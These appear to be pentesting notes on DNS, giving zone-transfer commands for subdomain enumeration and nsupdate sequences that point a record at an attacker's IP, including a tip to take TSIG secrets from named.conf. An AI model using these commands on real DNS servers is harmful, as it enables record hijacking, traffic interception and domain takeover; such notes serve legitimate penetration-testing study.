1.1 KiB
1.1 KiB
DNS
Subdomain Enumeration
- Get all the info via
dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
There is also subrake for sudbdomain enumeration. A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
Join a Domain
Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
nsupdate
server <DNS-IP>
update delete <sub.domain.com>
update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
Found Secrets for Keys
Sometimes secrets can be found secret like a key, for example in /etc/bind/named.conf. This secret can be used to join the domain.
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
namefromtext
keycreate
server <domain>
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP
send
Hint: Copy the lines, every space counts as it has to be exactly like in the example